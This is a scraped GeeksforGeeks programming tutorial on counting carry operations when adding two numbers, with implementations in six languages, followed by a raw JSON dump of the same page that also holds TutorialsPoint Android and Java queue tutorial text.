Shell Script" }, { "code": null, "e": 27909, "s": 27873, "text": "diff command in Linux with examples" } ]
Count the number of carry operations required to add two numbers - GeeksforGeeks
29 Oct, 2021

Given two numbers, the task is to find the number of carry operations required when the two numbers are added, as below.

  1234
+ 5678
------
  6912

Examples:

Input: n = 1234, k = 5678
Output: 2
4+8 = 12 → write 2, carry 1
carry+3+7 = 11 → write 1, carry 1
carry+2+6 = 9 → carry 0
1+5 = 6

Input: n = 555, k = 555
Output: 3

Approach: Store the values of n and k in strings.

Initialize the carry variable and the count variable to 0.
Now, check from the last index of the strings until both strings come to an end (one string may be shorter than the other).
Add both digit values (taking care of the ASCII offset) together with the carry in every iteration and check whether that sum is 10 or more.
If it is, increment count by 1 and set carry to 1; otherwise set carry to 0.
At last, print the answer, which is count.

Below is the implementation of the above approach:

C++

// C++ implementation of above approach
#include <bits/stdc++.h>
using namespace std;

// Function to count the number of carry operations
int count_carry(string a, string b)
{
    // Initialize the value of carry to 0
    int carry = 0;
    // Counts the number of carry operations
    int count = 0;
    // Initialize len_a and len_b with the sizes of the strings
    int len_a = a.length(), len_b = b.length();

    while (len_a != 0 || len_b != 0) {
        // Convert the digit characters to their numeric values
        int x = 0, y = 0;
        if (len_a > 0) {
            x = a[len_a - 1] - '0';
            len_a--;
        }
        if (len_b > 0) {
            y = b[len_b - 1] - '0';
            len_b--;
        }

        // Add both digits
        int sum = x + y + carry;

        // If sum >= 10, increment count and set carry to 1
        if (sum >= 10) {
            carry = 1;
            count++;
        }
        // Else, set carry to 0
        else
            carry = 0;
    }
    return count;
}

// Driver code
int main()
{
    string a = "9555", b = "555";
    int count = count_carry(a, b);
    cout << count << "\n";
    return 0;
}

Java

// Java implementation of above approach
import java.io.*;

class GFG {

    // Function to count the number of carry operations
    static int count_carry(String a, String b)
    {
        // Initialize the value of carry to 0
        int carry = 0;
        // Counts the number of carry operations
        int count = 0;
        // Initialize len_a and len_b with the sizes of the strings
        int len_a = a.length(), len_b = b.length();

        while (len_a != 0 || len_b != 0) {
            // Convert the digit characters to their numeric values
            int x = 0, y = 0;
            if (len_a > 0) {
                x = a.charAt(len_a - 1) - '0';
                len_a--;
            }
            if (len_b > 0) {
                y = b.charAt(len_b - 1) - '0';
                len_b--;
            }

            // Add both digits
            int sum = x + y + carry;

            // If sum >= 10, increment count and set carry to 1
            if (sum >= 10) {
                carry = 1;
                count++;
            }
            // Else, set carry to 0
            else
                carry = 0;
        }
        return count;
    }

    // Driver code
    public static void main(String[] args)
    {
        String a = "9555", b = "555";
        int count = count_carry(a, b);
        System.out.println(count);
    }
}

Python3

# Python3 implementation of above approach

# Function to count the number of carry operations
def count_carry(a, b):

    # Initialize the value of carry to 0
    carry = 0
    # Counts the number of carry operations
    count = 0
    # Initialize len_a and len_b with the sizes of the strings
    len_a = len(a)
    len_b = len(b)

    while len_a != 0 or len_b != 0:

        # Convert the digit characters to their numeric values
        x = 0
        y = 0
        if len_a > 0:
            x = int(a[len_a - 1])
            len_a -= 1
        if len_b > 0:
            y = int(b[len_b - 1])
            len_b -= 1

        # Add both digits
        sum = x + y + carry

        # If sum >= 10, increment count and set carry to 1
        if sum >= 10:
            carry = 1
            count += 1
        # Else, set carry to 0
        else:
            carry = 0

    return count


# Driver code
a = "9555"
b = "555"
count = count_carry(a, b)
print(count)

C#

// C# implementation of above approach
using System;

class GFG {

    // Function to count the number of carry operations
    static int count_carry(string a, string b)
    {
        // Initialize the value of carry to 0
        int carry = 0;
        // Counts the number of carry operations
        int count = 0;
        // Initialize len_a and len_b with the sizes of the strings
        int len_a = a.Length, len_b = b.Length;

        while (len_a != 0 || len_b != 0) {
            // Convert the digit characters to their numeric values
            int x = 0, y = 0;
            if (len_a > 0) {
                x = a[len_a - 1] - '0';
                len_a--;
            }
            if (len_b > 0) {
                y = b[len_b - 1] - '0';
                len_b--;
            }

            // Add both digits
            int sum = x + y + carry;

            // If sum >= 10, increment count and set carry to 1
            if (sum >= 10) {
                carry = 1;
                count++;
            }
            // Else, set carry to 0
            else
                carry = 0;
        }
        return count;
    }

    // Driver code
    public static void Main()
    {
        string a = "9555", b = "555";
        int count = count_carry(a, b);
        Console.Write(count);
    }
}

PHP

<?php
// PHP implementation of above approach

// Function to count the number of carry operations
function count_carry($a, $b)
{
    // Initialize the value of carry to 0
    $carry = 0;
    // Counts the number of carry operations
    $count = 0;
    // Initialize len_a and len_b with the sizes of the strings
    $len_a = strlen($a);
    $len_b = strlen($b);

    while ($len_a != 0 || $len_b != 0) {
        // Convert the digit characters to their numeric values
        $x = 0;
        $y = 0;
        if ($len_a > 0) {
            $x = $a[$len_a - 1] - '0';
            $len_a--;
        }
        if ($len_b > 0) {
            $y = $b[$len_b - 1] - '0';
            $len_b--;
        }

        // Add both digits
        $sum = $x + $y + $carry;

        // If sum >= 10, increment count and set carry to 1
        if ($sum >= 10) {
            $carry = 1;
            $count++;
        }
        // Else, set carry to 0
        else
            $carry = 0;
    }
    return $count;
}

// Driver code
$a = "9555";
$b = "555";
$count = count_carry($a, $b);
echo $count, "\n";
?>

Javascript

<script>
// Javascript implementation of above approach

// Function to count the number of carry operations
function count_carry(a, b)
{
    // Initialize the value of carry to 0
    let carry = 0;
    // Counts the number of carry operations
    let count = 0;
    // Initialize len_a and len_b with the sizes of the strings
    let len_a = a.length, len_b = b.length;

    while (len_a != 0 || len_b != 0) {
        // Convert the digit characters to their numeric values
        let x = 0, y = 0;
        if (len_a > 0) {
            x = a[len_a - 1] - '0';
            len_a--;
        }
        if (len_b > 0) {
            y = b[len_b - 1] - '0';
            len_b--;
        }

        // Add both digits
        let sum = x + y + carry;

        // If sum >= 10, increment count and set carry to 1
        if (sum >= 10) {
            carry = 1;
            count++;
        }
        // Else, set carry to 0
        else
            carry = 0;
    }
    return count;
}

// Driver code
let a = "9555", b = "555";
let count = count_carry(a, b);
document.write(count);
</script>

Output:
4
[ { "code": null, "e": 25476, "s": 25448, "text": "\n29 Oct, 2021" }, { "code": null, "e": 25593, "s": 25476, "text": "Given two numbers, the task is to find the number of carry operations required when two numbers are added as below. " }, { "code": null, "e": 25618, "s": 25593, "text": "1234 + 5678 ——– 6912 ——–" }, { "code": null, "e": 25630, "s": 25618, "text": "Examples: " }, { "code": null, "e": 25779, "s": 25630, "text": "Input: n = 1234, k = 5678\nOutput: 2\n\n4+8 = 2 and carry 1\ncarry+3+7 = carry 1\ncarry+2+6 = 9, carry 0\ncarry+1+5 = 6\n\nInput: n = 555, k = 555\nOutput: 3" }, { "code": null, "e": 25833, "s": 25781, "text": "Approach: Store the values of n and k in strings. " }, { "code": null, "e": 26304, "s": 25833, "text": "Initialize the carry variable and count variable to 0.Now, check from the last index of the strings till both the strings come to an end(one string may be smaller than the other).Add both the values(take care of ascii value) with carry in every iteration and check if that sum is greater than 10 or not.If it is greater than 10 then simply increment the value of count by 1 and make carry equal to 1, else make carry equal to 0.At last, print your answer which is count." }, { "code": null, "e": 26359, "s": 26304, "text": "Initialize the carry variable and count variable to 0." }, { "code": null, "e": 26485, "s": 26359, "text": "Now, check from the last index of the strings till both the strings come to an end(one string may be smaller than the other)." }, { "code": null, "e": 26610, "s": 26485, "text": "Add both the values(take care of ascii value) with carry in every iteration and check if that sum is greater than 10 or not." }, { "code": null, "e": 26736, "s": 26610, "text": "If it is greater than 10 then simply increment the value of count by 1 and make carry equal to 1, else make carry equal to 0." }, { "code": null, "e": 26779, "s": 26736, "text": "At last, print your answer which is count." 
}, { "code": null, "e": 26828, "s": 26779, "text": "Below is the implementation of above approach: " }, { "code": null, "e": 26832, "s": 26828, "text": "C++" }, { "code": null, "e": 26837, "s": 26832, "text": "Java" }, { "code": null, "e": 26845, "s": 26837, "text": "Python3" }, { "code": null, "e": 26848, "s": 26845, "text": "C#" }, { "code": null, "e": 26852, "s": 26848, "text": "PHP" }, { "code": null, "e": 26863, "s": 26852, "text": "Javascript" }, { "code": "// C++ implementation of above approach#include <bits/stdc++.h>using namespace std; // Function to count the number of// carry operationsint count_carry(string a, string b){ // Initialize the value of carry to 0 int carry = 0; // Counts the number of carry operations int count = 0; // Initialize len_a and len_b with the sizes of strings int len_a = a.length(), len_b = b.length(); while (len_a != 0 || len_b != 0) { // Assigning the ascii value of the character int x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codeint main(){ string a = \"9555\", b = \"555\"; int count = count_carry(a, b); if (count == 0) cout << \"0\\n\"; else if (count == 1) cout << \"1\\n\"; else cout << count << \"\\n\"; return 0;}", "e": 28108, "s": 26863, "text": null }, { "code": "// Java implementation of // above approachimport java.io.*; class GFG { // Function to count the number // of carry operationsstatic int count_carry(String a, String b){ // Initialize the value // of carry to 0 int carry = 0; // Counts the number of // carry operations int count = 0; // Initialize len_a and len_b // with the sizes of strings int len_a = a.length(), len_b = b.length(); while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character int x = 0, y = 0; if (len_a > 0) { x = a.charAt(len_a - 1) - '0'; len_a--; } if (len_b > 0) { y = b.charAt(len_b - 1) - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codepublic static void main (String[] args){ String a = \"9555\", b = \"555\"; int count = count_carry(a, b); if (count == 0) System.out.println(\"0\\n\"); else if (count == 1) System.out.println(\"1\\n\"); else System.out.println(count);}} // This code is contributed by Shashank", "e": 29516, "s": 28108, "text": null }, { "code": "# Python3 implementation of # above approach # Function to count the number # of carry operations def count_carry(a, b): # Initialize the value of # carry to 0 carry = 0; # Counts the number of carry # operations count = 0; # Initialize len_a and len_b # with the sizes of strings len_a = len(a); len_b = len(b); while (len_a != 0 or len_b != 0): # Assigning the ascii value # of the character x = 0; y = 0; if (len_a > 0): x = int(a[len_a - 1]) + int('0'); len_a -= 1; if (len_b > 0): y = int(b[len_b - 1]) + int('0'); len_b -= 1; # Add both numbers/digits sum = x + y + carry; # If sum > 0, increment count # and set carry to 1 if (sum >= 10): carry = 1; count += 1; # Else, set carry to 0 else: carry = 0; return count; # Driver code a = \"9555\";b = \"555\"; count = count_carry(a, b); if (count == 0): print(\"0\"); elif (count == 1): print(\"1\"); else: print(count); # This code 
is contributed by mits", "e": 30690, "s": 29516, "text": null }, { "code": "// C# implementation of // above approachusing System; class GFG { // Function to count the number // of carry operationsstatic int count_carry(string a, string b){ // Initialize the value // of carry to 0 int carry = 0; // Counts the number of // carry operations int count = 0; // Initialize len_a and len_b // with the sizes of strings int len_a = a.Length, len_b = b.Length; while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character int x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codepublic static void Main (){ string a = \"9555\", b = \"555\"; int count = count_carry(a, b); if (count == 0) Console.Write(\"0\\n\"); else if (count == 1) Console.Write(\"1\\n\"); else Console.Write(count);}} // This code is contributed// by ChitraNayal", "e": 32052, "s": 30690, "text": null }, { "code": "<?php// PHP implementation of above approach // Function to count the number // of carry operations function count_carry($a, $b) { // Initialize the value of // carry to 0 $carry = 0; // Counts the number of carry // operations $count = 0; // Initialize len_a and len_b // with the sizes of strings $len_a = strlen($a); $len_b = strlen($b); while ($len_a != 0 || $len_b != 0) { // Assigning the ascii value // of the character $x = 0; $y = 0; if ($len_a > 0) { $x = $a[$len_a - 1] - '0'; $len_a--; } if ($len_b > 0) { $y = $b[$len_b - 1] - '0'; $len_b--; } // Add both numbers/digits $sum = $x + $y + $carry; // If sum > 0, increment count // and set carry to 1 if ($sum >= 10) { $carry = 1; $count++; } // Else, set carry to 0 else $carry = 0; } return $count; } // Driver code $a = \"9555\";$b = \"555\"; $count = count_carry($a, $b); if ($count == 0) echo \"0\\n\"; else if ($count == 1) echo \"1\\n\"; else echo $count , \"\\n\"; // This code is contributed by jit_t?>", "e": 33332, "s": 32052, "text": null }, { "code": "<script> // Javascript implementation of above approach // Function to count the number // of carry operations function count_carry(a, b) { // Initialize the value // of carry to 0 let carry = 0; // Counts the number of // carry operations let count = 0; // Initialize len_a and len_b // with the sizes of strings let len_a = a.length, len_b = b.length; while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character let x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits let sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count; } let a = \"9555\", b = \"555\"; let count = count_carry(a, b); if (count == 0) document.write(\"0\" + \"</br>\"); else if (count == 1) document.write(\"1\" + \"</br>\"); else document.write(count); </script>", "e": 34774, "s": 33332, "text": null }, { "code": null, "e": 34776, "s": 34774, "text": "4" }, { "code": null, "e": 34789, "s": 34778, "text": "Shashank12" }, { "code": null, "e": 34795, "s": 34789, "text": "ukasp" }, { "code": null, "e": 34801, "s": 34795, "text": "jit_t" }, { "code": null, "e": 34814, "s": 34801, "text": "Mithun Kumar" }, { "code": null, "e": 34823, 
"s": 34814, "text": "suresh07" }, { "code": null, "e": 34840, "s": 34823, "text": "surinderdawra388" }, { "code": null, "e": 34860, "s": 34840, "text": "ankitsahaisaxena234" }, { "code": null, "e": 34874, "s": 34860, "text": "chhabradhanvi" }, { "code": null, "e": 34882, "s": 34874, "text": "Numbers" }, { "code": null, "e": 34906, "s": 34882, "text": "Competitive Programming" }, { "code": null, "e": 34919, "s": 34906, "text": "Mathematical" }, { "code": null, "e": 34927, "s": 34919, "text": "Strings" }, { "code": null, "e": 34935, "s": 34927, "text": "Strings" }, { "code": null, "e": 34948, "s": 34935, "text": "Mathematical" }, { "code": null, "e": 34956, "s": 34948, "text": "Numbers" }, { "code": null, "e": 35054, "s": 34956, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 35092, "s": 35054, "text": "Bits manipulation (Important tactics)" }, { "code": null, "e": 35119, "s": 35092, "text": "Modulo 10^9+7 (1000000007)" }, { "code": null, "e": 35197, "s": 35119, "text": "Prefix Sum Array - Implementation and Applications in Competitive Programming" }, { "code": null, "e": 35222, "s": 35197, "text": "Formatted output in Java" }, { "code": null, "e": 35268, "s": 35222, "text": "Breadth First Traversal ( BFS ) on a 2D array" }, { "code": null, "e": 35298, "s": 35268, "text": "Program for Fibonacci numbers" }, { "code": null, "e": 35358, "s": 35298, "text": "Write a program to print all permutations of a given string" }, { "code": null, "e": 35373, "s": 35358, "text": "C++ Data Types" }, { "code": null, "e": 35416, "s": 35373, "text": "Set in C++ Standard Template Library (STL)" } ]
How can I know when an EditText loses focus in Android?
This example demonstrates how to know when an EditText loses focus.

Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill in all required details to create a new project.

Step 2 − Add the following code to res/layout/activity_main.xml.

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
   android:id="@+id/parent"
   xmlns:tools="http://schemas.android.com/tools"
   android:layout_width="match_parent"
   android:layout_height="match_parent"
   tools:context=".MainActivity"
   android:gravity="center"
   android:orientation="vertical">
   <EditText
      android:id="@+id/editText"
      android:hint="Losing focus example"
      android:layout_width="wrap_content"
      android:layout_height="wrap_content" />
   <Button
      android:id="@+id/removeFocus"
      android:text="Remove Focus"
      android:layout_width="wrap_content"
      android:layout_height="wrap_content" />
   <Button
      android:id="@+id/gainFocus"
      android:text="Gain Focus"
      android:layout_width="wrap_content"
      android:layout_height="wrap_content" />
</LinearLayout>

In the above code, we have taken one EditText and two buttons. The "Remove Focus" button removes the focus from the EditText and the other button makes it focusable again.

Step 3 − Add the following code to src/MainActivity.java

package com.example.andy.myapplication;

import android.os.Build;
import android.os.Bundle;
import android.support.annotation.RequiresApi;
import android.support.v7.app.AppCompatActivity;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;

public class MainActivity extends AppCompatActivity {
   int view = R.layout.activity_main;
   EditText editText;
   Button removeFocus, gainFocus;

   @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN)
   @Override
   protected void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(view);
      editText = findViewById(R.id.editText);
      removeFocus = findViewById(R.id.removeFocus);
      gainFocus = findViewById(R.id.gainFocus);
      gainFocus.setOnClickListener(new View.OnClickListener() {
         @Override
         public void onClick(View v) {
            editText.setFocusableInTouchMode(true);
            editText.setFocusable(true);
         }
      });
      removeFocus.setOnClickListener(new View.OnClickListener() {
         @Override
         public void onClick(View v) {
            editText.setFocusableInTouchMode(false);
            editText.setFocusable(false);
         }
      });
      editText.setOnFocusChangeListener(new View.OnFocusChangeListener() {
         @Override
         public void onFocusChange(View v, boolean hasFocus) {
            if (!hasFocus) {
               Toast.makeText(MainActivity.this, "focus lost", Toast.LENGTH_LONG).show();
            } else {
               Toast.makeText(MainActivity.this, "focused", Toast.LENGTH_LONG).show();
            }
         }
      });
   }
}
Select your mobile device as an option and then check your mobile device, which will display your default screen − In the above result, we have clicked on Remove Focus; a "focus lost" message is shown (note the cursor). Now click on Gain Focus and the EditText will gain focus as shown below −
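If the goal is only to move focus around rather than make the EditText non-focusable, Android views also expose clearFocus() and requestFocus(). The snippet below is an illustrative sketch only; it is not part of the tutorial above, and the extra button id used here is hypothetical.

// Alternative sketch: move focus instead of toggling focusability.
// Assumes the EditText from the layout above; R.id.dropFocus is a hypothetical extra button.
Button dropFocus = findViewById(R.id.dropFocus);
dropFocus.setOnClickListener(new View.OnClickListener() {
   @Override
   public void onClick(View v) {
      // Gives up focus; the OnFocusChangeListener above fires with hasFocus = false
      editText.clearFocus();
      // Later, focus can be handed back programmatically:
      // editText.requestFocus();
   }
});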
[ { "code": null, "e": 1133, "s": 1062, "text": "This example demonstrates how can I know when an EditText loses focus." }, { "code": null, "e": 1262, "s": 1133, "text": "Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project." }, { "code": null, "e": 1327, "s": 1262, "text": "Step 2 − Add the following code to res/layout/activity_main.xml." }, { "code": null, "e": 2209, "s": 1327, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<LinearLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\nandroid:id=\"@+id/parent\"\nxmlns:tools=\"http://schemas.android.com/tools\"\nandroid:layout_width=\"match_parent\"\nandroid:layout_height=\"match_parent\"\ntools:context=\".MainActivity\"\nandroid:gravity=\"center\"\nandroid:orientation=\"vertical\">\n <EditText\n android:id=\"@+id/editText\"\n android:hint=\"Loosing focus example\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\" >\n</EditText>\n <Button\n android:id=\"@+id/removeFocus\"\n android:text=\"Remove Focus\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\" />\n <Button\n android:id=\"@+id/gainFocus\"\n android:text=\"Gain Focus\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\" />\n</LinearLayout>" }, { "code": null, "e": 2383, "s": 2209, "text": "In the above code, we have taken one edit text and two buttons. remove focus button going to remove the focus of edit text and other button going to gain focus of edit text." }, { "code": null, "e": 2440, "s": 2383, "text": "Step 3 − Add the following code to src/MainActivity.java" }, { "code": null, "e": 4135, "s": 2440, "text": "package com.example.andy.myapplication;\nimport android.os.Build;\nimport android.os.Bundle;\nimport android.support.annotation.RequiresApi;\nimport android.support.v7.app.AppCompatActivity;\nimport android.view.View;\nimport android.widget.Button;\nimport android.widget.EditText;\nimport android.widget.Toast;\npublic class MainActivity extends AppCompatActivity {\n int view = R.layout.activity_main;\n EditText editText;\n Button removeFocus, gainFocus;\n @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN)\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(view);\n editText = findViewById(R.id.editText);\n removeFocus = findViewById(R.id.removeFocus);\n gainFocus = findViewById(R.id.gainFocus);\n gainFocus.setOnClickListener(new View.OnClickListener() {\n @Override\n public void onClick(View v) {\n editText.setFocusableInTouchMode(true);\n editText.setFocusable(true);\n }\n });\n removeFocus.setOnClickListener(new View.OnClickListener() {\n @Override\n public void onClick(View v) {\n editText.setFocusableInTouchMode(false);\n editText.setFocusable(false);\n }\n });\n editText.setOnFocusChangeListener(new View.OnFocusChangeListener() {\n @Override\n public void onFocusChange(View v, boolean hasFocus) {\n if (!hasFocus) {\n Toast.makeText(MainActivity.this, \"focus loosed\", Toast.LENGTH_LONG).show();\n } else {\n Toast.makeText(MainActivity.this, \"focused\", Toast.LENGTH_LONG).show();\n }\n }\n });\n }\n}" }, { "code": null, "e": 4195, "s": 4135, "text": "In the above button, we have removed focus as shown below -" }, { "code": null, "e": 4266, "s": 4195, "text": "editText.setFocusableInTouchMode(false);\neditText.setFocusable(false);" }, { "code": null, "e": 4305, "s": 4266, "text": "To gain focus use the following 
code -" }, { "code": null, "e": 4374, "s": 4305, "text": "editText.setFocusableInTouchMode(true);\neditText.setFocusable(true);" }, { "code": null, "e": 4432, "s": 4374, "text": "To find the status of focus in edit text as shown below -" }, { "code": null, "e": 4793, "s": 4432, "text": "editText.setOnFocusChangeListener(new View.OnFocusChangeListener() {\n @Override\n public void onFocusChange(View v, boolean hasFocus) {\n if (!hasFocus) {\n Toast.makeText(MainActivity.this, \"focus loosed\", Toast.LENGTH_LONG).show();\n } else {\n Toast.makeText(MainActivity.this, \"focused\", Toast.LENGTH_LONG).show();\n }\n }\n});" }, { "code": null, "e": 5141, "s": 4793, "text": "Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from android studio, open one of your project's activity files and click Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen −" }, { "code": null, "e": 5312, "s": 5141, "text": "In the above result, we have clicked on remove focus. it is showing a message as focus loosed(check cursor ). now click on gain focus, it will gain focus as shown below -" }, { "code": null, "e": 5352, "s": 5312, "text": "Click here to download the project code" } ]
DSA using Java - Queue
A queue is a kind of data structure similar to a stack, with the primary difference that the first item inserted is the first item to be removed (FIFO - First In First Out), whereas a stack is based on the LIFO (Last In First Out) principle. insert / enqueue − add an item to the rear of the queue. remove / dequeue − remove an item from the front of the queue. We're going to implement Queue using an array in this article. There are a few more operations supported by the queue, which are the following. Peek − get the element at the front of the queue. isFull − check if the queue is full. isEmpty − check if the queue is empty. Whenever an element is inserted into the queue, the queue increments the rear index and stores that element at the rear end of the storage. If the rear end reaches the last index, it is wrapped around to the bottom location. Such an arrangement is called wrap around, and such a queue is a circular queue. This method is also termed the enqueue operation. public void insert(int data){ if(!isFull()){ if(rear == MAX-1){ rear = -1; } intArray[++rear] = data; itemCount++; } } Whenever an element is to be removed from the queue, the queue gets the element using the front index and increments the front index. As a wrap-around arrangement, if the front index goes past the array's max index, it is set to 0. public int remove(){ int data = intArray[front++]; if(front == MAX){ front = 0; } itemCount--; return data; } Queue.java package com.tutorialspoint.datastructure; public class Queue { private final int MAX; private int[] intArray; private int front; private int rear; private int itemCount; public Queue(int size){ MAX = size; intArray = new int[MAX]; front = 0; rear = -1; itemCount = 0; } public void insert(int data){ if(!isFull()){ if(rear == MAX-1){ rear = -1; } intArray[++rear] = data; itemCount++; } } public int remove(){ int data = intArray[front++]; if(front == MAX){ front = 0; } itemCount--; return data; } public int peek(){ return intArray[front]; } public boolean isEmpty(){ return itemCount == 0; } public boolean isFull(){ return itemCount == MAX; } public int size(){ return itemCount; } } QueueDemo.java package com.tutorialspoint.datastructure; public class QueueDemo { public static void main(String[] args){ Queue queue = new Queue(6); //insert 5 items queue.insert(3); queue.insert(5); queue.insert(9); queue.insert(1); queue.insert(12); // front : 0 // rear : 4 // ------------------ // index : 0 1 2 3 4 // ------------------ // queue : 3 5 9 1 12 queue.insert(15); // front : 0 // rear : 5 // --------------------- // index : 0 1 2 3 4 5 // --------------------- // queue : 3 5 9 1 12 15 if(queue.isFull()){ System.out.println("Queue is full!"); } //remove one item int num = queue.remove(); System.out.println("Element removed: "+num); // front : 1 // rear : 5 // ------------------- // index : 1 2 3 4 5 // ------------------- // queue : 5 9 1 12 15 //insert more items queue.insert(16); // front : 1 // rear : -1 // ---------------------- // index : 0 1 2 3 4 5 // ---------------------- // queue : 16 5 9 1 12 15 //As queue is full, elements will not be inserted.
queue.insert(17); queue.insert(18); // ---------------------- // index : 0 1 2 3 4 5 // ---------------------- // queue : 16 5 9 1 12 15 System.out.println("Element at front: "+queue.peek()); System.out.println("----------------------"); System.out.println("index : 5 4 3 2 1 0"); System.out.println("----------------------"); System.out.print("Queue: "); while(!queue.isEmpty()){ int n = queue.remove(); System.out.print(n +" "); } } } If we compile and run the above program, then it would produce the following result − Queue is full! Element removed: 3 Element at front: 5 ---------------------- index : 5 4 3 2 1 0 ---------------------- Queue: 5 9 1 12 15 16
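For real applications, note that the JDK already ships a queue implementation, so a hand-rolled array queue is mainly of educational value. The following short sketch (not part of the tutorial above) shows the equivalent operations with java.util.ArrayDeque:

import java.util.ArrayDeque;
import java.util.Queue;

public class StdLibQueueDemo {
   public static void main(String[] args) {
      // ArrayDeque grows as needed, so there is no fixed-capacity "queue full" case
      Queue<Integer> queue = new ArrayDeque<>();
      queue.offer(3);  // enqueue at the rear
      queue.offer(5);
      queue.offer(9);
      System.out.println("Element at front: " + queue.peek()); // 3
      System.out.println("Element removed: " + queue.poll());  // dequeues 3
      System.out.println("Remaining size: " + queue.size());   // 2
   }
}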
[ { "code": null, "e": 2390, "s": 2168, "text": "Queue is kind of data structure similar to stack with primary difference that the first item inserted is the first item to be removed (FIFO - First In First Out) where stack is based on LIFO, Last In First Out principal." }, { "code": null, "e": 2447, "s": 2390, "text": "insert / enqueue − add an item to the rear of the queue." }, { "code": null, "e": 2504, "s": 2447, "text": "insert / enqueue − add an item to the rear of the queue." }, { "code": null, "e": 2567, "s": 2504, "text": "remove / dequeue − remove an item from the front of the queue." }, { "code": null, "e": 2630, "s": 2567, "text": "remove / dequeue − remove an item from the front of the queue." }, { "code": null, "e": 2759, "s": 2630, "text": "We're going to implement Queue using array in this article. There is few more operations supported by queue which are following." }, { "code": null, "e": 2805, "s": 2759, "text": "Peek − get the element at front of the queue." }, { "code": null, "e": 2851, "s": 2805, "text": "Peek − get the element at front of the queue." }, { "code": null, "e": 2884, "s": 2851, "text": "isFull − check if queue is full." }, { "code": null, "e": 2917, "s": 2884, "text": "isFull − check if queue is full." }, { "code": null, "e": 2952, "s": 2917, "text": "isEmpty − check if queue is empty." }, { "code": null, "e": 2987, "s": 2952, "text": "isEmpty − check if queue is empty." }, { "code": null, "e": 3338, "s": 2987, "text": "Whenever an element is inserted into queue, queue increments the rear index for later use and stores that element at the rear end of the storage. If rear end reaches to the last index and it is wrapped to the bottom location. Such an arrangement is called wrap around and such queue is circular queue. This method is also termed as enqueue operation." }, { "code": null, "e": 3522, "s": 3338, "text": "public void insert(int data){\n if(!isFull()){\n if(rear == MAX-1){\n rear = -1; \n } \n \n intArray[++rear] = data;\n itemCount++;\n }\n}" }, { "code": null, "e": 3737, "s": 3522, "text": "Whenever an element is to be removed from queue, queue get the element using front index and increments the front index. As a wrap around arrangement, if front index is more than array's max index, it is set to 0. 
" }, { "code": null, "e": 3875, "s": 3737, "text": " \t \t\npublic int remove(){\n int data = intArray[front++];\n if(front == MAX){\n front = 0;\n }\n itemCount--;\n return data; \n}" }, { "code": null, "e": 3886, "s": 3875, "text": "Queue.java" }, { "code": null, "e": 4823, "s": 3886, "text": "package com.tutorialspoint.datastructure;\n\npublic class Queue {\n \n private final int MAX;\n private int[] intArray;\n private int front;\n private int rear;\n private int itemCount;\n\n public Queue(int size){\n MAX = size;\n intArray = new int[MAX];\n front = 0;\n rear = -1;\n itemCount = 0;\n }\n\n public void insert(int data){\n if(!isFull()){\n if(rear == MAX-1){\n rear = -1; \n } \n\n intArray[++rear] = data;\n itemCount++;\n }\n }\n\n public int remove(){\n int data = intArray[front++];\n if(front == MAX){\n front = 0;\n }\n itemCount--;\n return data; \n }\n\n public int peek(){\n return intArray[front];\n }\n\n public boolean isEmpty(){\n return itemCount == 0;\n }\n\n public boolean isFull(){\n return itemCount == MAX;\n }\n\n public int size(){\n return itemCount;\n } \n}" }, { "code": null, "e": 4838, "s": 4823, "text": "QueueDemo.java" }, { "code": null, "e": 6647, "s": 4838, "text": "package com.tutorialspoint.datastructure;\n\npublic class QueueDemo {\n public static void main(String[] args){\n Queue queue = new Queue(6);\n \n //insert 5 items\n queue.insert(3);\n queue.insert(5);\n queue.insert(9);\n queue.insert(1);\n queue.insert(12);\n\n // front : 0\n // rear : 4\n // ------------------\n // index : 0 1 2 3 4 \n // ------------------\n // queue : 3 5 9 1 12\n\n queue.insert(15);\n\n // front : 0\n // rear : 5\n // ---------------------\n // index : 0 1 2 3 4 5 \n // ---------------------\n // queue : 3 5 9 1 12 15\n\n if(queue.isFull()){\n System.out.println(\"Queue is full!\"); \n }\n\n\n //remove one item\n int num = queue.remove();\n System.out.println(\"Element removed: \"+num);\n // front : 1\n // rear : 5\n // -------------------\n // index : 1 2 3 4 5\n // -------------------\n // queue : 5 9 1 12 15\n\n //insert more items\n queue.insert(16);\n\n // front : 1\n // rear : -1\n // ----------------------\n // index : 0 1 2 